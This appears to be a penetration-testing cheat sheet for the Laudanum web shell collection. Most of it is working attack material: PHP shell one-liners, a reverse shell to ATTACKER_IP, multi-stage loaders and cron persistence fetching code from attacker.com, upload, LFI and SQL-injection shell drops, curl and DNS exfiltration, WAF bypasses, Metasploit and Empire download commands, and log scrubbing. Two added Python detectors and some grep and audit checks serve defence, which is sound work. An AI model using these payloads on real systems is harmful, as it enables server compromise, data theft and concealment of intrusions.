Overview
Laudanum is a collection of pre-built, injectable web shells and reverse shell scripts designed for authorized penetration testing. It includes shells for multiple web technologies (ASP, ASPX, PHP, Perl, JSP, ColdFusion) and provides payloads for establishing reverse connections, spawning shells, and executing arbitrary commands on compromised web servers. It is used by authorized security professionals for post-exploitation and lateral movement exercises.
Installation and Setup
Repository Access
# Clone Laudanum from GitHub
git clone https://github.com/laudanum/laudanum.git
cd laudanum
# List available shells
ls -la
# Directory structure
# ├── aspx/
# ├── asp/
# ├── php/
# ├── perl/
# ├── jsp/
# ├── cfm/
# └── shell_finder/
Linux Installation
# Install dependencies
apt-get update
apt-get install curl wget netcat-openbsd
# Optional: PHP CLI for testing
apt-get install php-cli
# Make scripts executable
chmod +x laudanum/shell_finder/*
macOS Installation
# Using Homebrew
brew install curl wget netcat
# Clone repository
git clone https://github.com/laudanum/laudanum.git
# Navigate to directory
cd laudanum
Web Shell Types and Usage
PHP Shells
| Shell File | Type | Purpose |
|---|---|---|
| php/shell.php | Interactive shell | Full command execution |
| php/reverse.php | Reverse shell | Establish reverse connection |
| php/upload.php | File upload | Upload files to server |
| php/info.php | System info | Enumerate server details |
ASP/ASPX Shells
| Shell File | Type | Purpose |
|---|---|---|
| aspx/shell.aspx | Interactive shell | Windows server exploitation |
| aspx/reverse.aspx | Reverse shell | Reverse ASPX connection |
| asp/shell.asp | Legacy shell | Classic ASP applications |
| aspx/cmdasp.aspx | Command shell | Execute system commands |
Deploying Web Shells
Basic PHP Shell Deployment
# Copy PHP shell to web directory
cp laudanum/php/shell.php /var/www/html/
# Verify deployment
curl http://target.com/shell.php
# Test command execution
curl "http://target.com/shell.php?cmd=id"
curl "http://target.com/shell.php?cmd=whoami"
curl "http://target.com/shell.php?cmd=uname%20-a"
Obfuscated Shell Upload
# Rename to bypass detection
cp laudanum/php/shell.php /tmp/config.php
# Upload via vulnerable form
# Using curl to POST file
curl -X POST -F "upload=@/tmp/config.php" \
http://target.com/upload.php
# Or use with XXE/LFI vulnerabilities
# URL encode the shell content
echo '<?php system($_GET["c"]); ?>' | base64
# Result: PD9waHAgc3lzdGVtKCRfR0VUWyJjIl0pOyA/Pg==
Shell Parameter Names
# Common parameter variations
curl "http://target.com/shell.php?cmd=id"
curl "http://target.com/shell.php?c=id"
curl "http://target.com/shell.php?cmd=whoami"
curl "http://target.com/shell.php?command=id"
curl "http://target.com/shell.php?exec=id"
curl "http://target.com/shell.php?system=id"
Reverse Shell Implementation
PHP Reverse Shell
// From laudanum/php/reverse.php
<?php
$sock=fsockopen("ATTACKER_IP",PORT);
exec("/bin/bash -i <&3 >&3 2>&3");
?>
// Usage:
// 1. Modify ATTACKER_IP and PORT
// 2. Set up listener: nc -lvnp PORT
// 3. Upload and access shell
Deploying with Netcat Listener
# Terminal 1: Set up listener
nc -lvnp 4444
# Terminal 2: Access reverse shell
curl http://target.com/reverse.php
# Or upload and execute if automated
# Connection established - full shell access
id
whoami
pwd
ls -la
ASPX Reverse Shell
# Copy ASPX reverse shell
cp laudanum/aspx/reverse.aspx /tmp/
# Modify connection details
sed -i 's/LHOST/192.168.1.100/g' reverse.aspx
sed -i 's/LPORT/4444/g' reverse.aspx
# Upload to ASP.NET application
# Access via: http://target.com/shell.aspx
Identifying Shells
# Use shell_finder to locate Laudanum shells
cd laudanum/shell_finder
# Find PHP shells in directory
./shell_finder.py /path/to/webroot --php
# Find all shell types
./shell_finder.py /path/to/webroot --all
# Recursive search
./shell_finder.py /var/www/html -r
Shell Detection Patterns
# Signature detection: files whose contents reference known shell names or sinks
grep -r "shell.php" /var/www/html
grep -r "reverse.aspx" /var/www/html
grep -r "system(" /var/www/html
# Find by suspicious patterns
grep -r "fsockopen\|exec\|passthru" /var/www/html
grep -r "eval(" /var/www/html
grep -r "assert(" /var/www/html
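The grep patterns above match any file that calls `exec` or `system`, which includes a lot of legitimate code. As an added example (not part of Laudanum or its shell_finder), this Python scanner scores files on stronger indicators: request input reaching an execution sink, decode-then-execute chains, and outbound sockets, and it inspects any file containing a PHP open tag regardless of extension. The rule names, weights and sample sources are constructed for illustration.

```python
import re
from pathlib import Path

# Assumption: rule names and weights are illustrative, not Laudanum's own signatures.
SINK = r"\b(?:system|exec|passthru|shell_exec|popen|proc_open|eval|assert)\s*\("
INPUT = r"\$_(?:GET|POST|REQUEST|COOKIE)\b"
RULES = [
    # Request input passed into an execution sink within one statement.
    ("input_to_sink", 5, re.compile(SINK + r"[^;]*" + INPUT, re.I)),
    # Decoded or decompressed data handed to eval/include (encoded shells).
    ("decode_to_exec", 4, re.compile(
        r"\b(?:eval|assert|include|require)(?:_once)?\b[^;]*"
        r"\b(?:base64_decode|gzuncompress|gzinflate|str_rot13)\s*\(", re.I)),
    # Outbound socket opened from web code, as a reverse shell does.
    ("outbound_socket", 3, re.compile(r"\bfsockopen\s*\(", re.I)),
    # Any execution sink at all: weak on its own, common in legitimate code.
    ("bare_sink", 1, re.compile(SINK, re.I)),
]
PHP_TAG = re.compile(r"<\?(?:php|=)", re.I)

def score_source(text):
    """Return (score, matched rule names) for one file's contents."""
    hits = [(name, weight) for name, weight, rx in RULES if rx.search(text)]
    return sum(w for _, w in hits), [n for n, _ in hits]

def scan_tree(root, threshold=4):
    """Score every file containing a PHP open tag, whatever its extension,
    so renamed shells and image uploads carrying PHP are covered."""
    findings = []
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        text = path.read_text(errors="replace")
        if PHP_TAG.search(text):
            score, rules = score_source(text)
            if score >= threshold:
                findings.append((str(path), score, rules))
    return sorted(findings, key=lambda f: -f[1])

# Constructed samples: two shell one-liners and one benign script.
SAMPLES = {
    "param_shell": '<?php system($_GET["c"]); ?>',
    "reverse": '<?php $s=fsockopen("192.0.2.10",4444); exec("/bin/sh -i <&3 >&3 2>&3"); ?>',
    "benign": '<?php exec("convert in.png out.png"); echo htmlspecialchars($_GET["q"]); ?>',
}

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        print(name, score_source(src))
```

Scores at or above the threshold are triage leads, not verdicts; tune the weights against a known-clean copy of the application before alerting on them.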
Advanced Deployment Techniques
Multi-Stage Deployment
# Stage 1: Drop initial shell via vulnerability
curl -X POST -d 'file=<?php include("http://attacker.com/shell.php"); ?>' \
http://target.com/vulnerable.php
# Stage 2: Second stage downloads full featured shell
# Shell 1 fetches Shell 2
curl -o /tmp/shell2.php http://attacker.com/shell2.php
# Stage 3: Executes with higher privileges or automation
php /tmp/shell2.php
Encoding and Obfuscation
# Base64 encode shell for bypass
base64 -w0 laudanum/php/shell.php > shell.b64
# Gzip compression
gzip -c laudanum/php/shell.php > shell.php.gz
# ROT13 encoding
tr 'A-Za-z' 'N-ZA-Mn-za-m' < laudanum/php/shell.php > shell.rot13
# Deploy encoded version
echo '<?php include(gzuncompress(base64_decode("ENCODED_CONTENT"))); ?>' > shell.php
Persistence Mechanisms
# Create cron job for persistence
<?php
$cmd = "curl http://attacker.com/shell.php > /tmp/shell.php && php /tmp/shell.php";
exec("echo '*/5 * * * * $cmd' | crontab -");
?>
# Add to startup scripts
echo 'php /var/www/html/shell.php' >> ~/.bashrc
# Modify web server configuration
echo 'php_flag auto_prepend_file /var/www/html/shell.php' >> .htaccess
Exploitation Scenarios
File Upload Vulnerability
# Vulnerable upload handler found
POST /upload.php HTTP/1.1
Host: target.com
Content-Type: multipart/form-data
--boundary
Content-Disposition: form-data; name="file"; filename="image.php"
Content-Type: application/x-php
<?php system($_GET['c']); ?>
--boundary--
# Access shell
curl "http://target.com/uploads/image.php?c=id"
Local File Inclusion (LFI)
# If LFI exists, can include remote shell
http://target.com/page.php?file=http://attacker.com/shell.php
# Or include from /tmp if upload possible
http://target.com/page.php?file=/tmp/shell.php
# For wrapper exploitation
http://target.com/page.php?file=php://filter/convert.base64-encode/resource=shell.php
SQL Injection into File
# If SQL results written to file
'; SELECT '<?php system($_GET["c"]); ?>' INTO OUTFILE '/var/www/html/shell.php'; --
# MySQL example
sqlmap -u "http://target.com/?id=1" --file-write=shell.php --file-dest=/var/www/html/shell.php
Command Execution Through Shells
Basic Commands
| Command | Purpose |
|---|---|
| id | Show current user ID |
| whoami | Display current username |
| pwd | Print working directory |
| ls -la | List directory contents |
| cat /etc/passwd | Read system files |
| ifconfig | Network configuration |
| ps aux | Running processes |
Post-Exploitation Actions
# Enumerate system
uname -a
cat /etc/os-release
df -h
free -m
# Network reconnaissance
netstat -tuln
ss -tulnp
arp -a
route -n
# User enumeration
cat /etc/shadow # If readable
getent passwd
sudo -l
# Privilege escalation checks
find / -perm -4000 2>/dev/null
find / -perm -2000 2>/dev/null
dpkg -l | grep sudo
Data Exfiltration
# Compress sensitive data
tar czf - /var/www/html/ | curl -X POST -d @- http://attacker.com/recv.php
# Encode and transmit
cat /etc/passwd | base64 | curl -d @- http://attacker.com/log.php
# DNS exfiltration (if HTTP blocked)
nslookup $(cat file.txt | base64 -w 0).attacker.com
Security Considerations
Detection and Prevention
# Web Application Firewall (WAF) bypass
# Use URL encoding, double encoding, hex encoding
# Example: system() -> sy%73%74%65%6d()
# Content-Type bypass
# Upload as image but use PHP content
# Magic bytes bypass
# Prepend valid file header to PHP shell
# JPEG: FF D8 FF E0 ... <?php ... ?>
Monitoring and Detection
# List files that call command-execution functions (recursive)
grep -rl "exec\|system\|passthru\|shell_exec" /var/www/html
# Watch the web root for file writes and attribute changes
auditctl -w /var/www/html/ -p wa -k webshell
# Check web server logs
tail -f /var/log/apache2/access.log | grep "system\|exec\|cmd"
# Find files modified more recently than a reference marker file
find /var/www/html -type f -newer /tmp/marker -ls
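The `tail | grep` check above matches literal strings only, so a percent-encoded request such as the `sy%73%74%65%6d` form listed under Detection and Prevention passes it. As an added example (not from Laudanum), this Python detector parses combined-format access log lines, undoes repeated percent-encoding, and flags requests whose parameter name is on this page's Shell Parameter Names list and whose value looks like a command. The value patterns and log lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Parameter names from the "Shell Parameter Names" list on this page.
SHELL_PARAMS = {"cmd", "c", "command", "exec", "system"}
# Assumption: illustrative patterns for command-like values.
CMD_VALUE = re.compile(
    r"^(?:id|whoami|pwd|uname\b.*|ls\b.*|cat\s+/.*)$"  # commands used on this page
    r"|[;|`]|\$\(|2>&1")                               # shell metacharacters
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def fully_decode(value, max_rounds=3):
    """Undo single and double percent-encoding."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_line(line):
    """Return a finding dict for a suspicious request, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, method, target, status = m.groups()
    parts = urlsplit(target)
    reasons = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        name, value = fully_decode(name).lower(), fully_decode(value).strip()
        if name in SHELL_PARAMS and CMD_VALUE.search(value):
            reasons.append(f"{name}={value}")
    if not reasons:
        return None
    return {"client": client, "path": parts.path, "status": int(status), "reasons": reasons}

def scan_log(lines):
    return [f for f in map(inspect_line, lines) if f]

# Constructed log lines (documentation address ranges).
SAMPLE_LOG = [
    '198.51.100.7 - - [02/May/2026:10:30:01 +0000] "GET /uploads/image.php?c=id HTTP/1.1" 200 54',
    '198.51.100.7 - - [02/May/2026:10:30:09 +0000] "GET /shell.php?cmd=uname%2520-a HTTP/1.1" 200 120',
    '203.0.113.5 - - [02/May/2026:10:31:00 +0000] "GET /shop.php?c=12 HTTP/1.1" 200 2048',
    '203.0.113.5 - - [02/May/2026:10:31:05 +0000] "GET /search.php?q=system+requirements HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    print(scan_log(SAMPLE_LOG))
```

Access logs record only the query string, so shells driven through POST bodies need request-body logging or the file and audit checks above.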
Integration with Frameworks
# Use Laudanum shells with msfvenom
msfvenom -p php/reverse_php LHOST=192.168.1.100 LPORT=4444 -o shell.php
# Generate ASP.NET shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f aspx > shell.aspx
# Generate handler
msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.100; set LPORT 4444; run"
Empire/PowerShell Empire
# Generate PowerShell shell
./empire -U "User" -P "Pass" -E "invoke-expression(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')"
# Stage through Laudanum PHP shell
<?php
$ps_code = base64_decode($_POST['d']);
exec("powershell -enc $ps_code");
?>
Troubleshooting Common Issues
Shell Not Executing
# Check PHP is enabled
curl http://target.com/info.php
# Verify shell syntax
php -l shell.php
# Check file permissions
ls -la /var/www/html/shell.php
# Should be readable by web server user
# Test with different parameter names
curl "http://target.com/shell.php?cmd=id"
curl "http://target.com/shell.php?c=id"
curl "http://target.com/shell.php?command=id"
Connection Issues
# Test listener is running
netstat -tuln | grep 4444
# Check firewall rules
sudo ufw status
sudo iptables -L -n
# Test reverse shell locally first
php laudanum/php/reverse.php
# With listener running first
nc -lvnp 4444
Output Not Displayed
# Redirect errors to stdout
curl "http://target.com/shell.php?cmd=id%202%3E%261"
# Use alternative shells
<?php passthru($_GET['c']); ?>
<?php shell_exec($_GET['c']); ?>
<?php eval($_POST['c']); ?>
Legal and Ethical Use
Authorization Checklist
- Written scope of work defining authorized targets
- Explicit permission for shell deployment
- Time-limited testing window
- Secure handling and removal of shells post-engagement
- Incident response procedures documented
Post-Engagement Cleanup
# Remove shells after testing
rm /var/www/html/shell.php
rm /var/www/html/reverse.aspx
rm /tmp/shell.php
# Clear logs of shell access
# (With proper authorization)
# grep -v "shell.php" /var/log/apache2/access.log > /tmp/access.log.clean
# Document all shells deployed
echo "shell.php deployed 2026-05-02 10:30 UTC - REMOVED"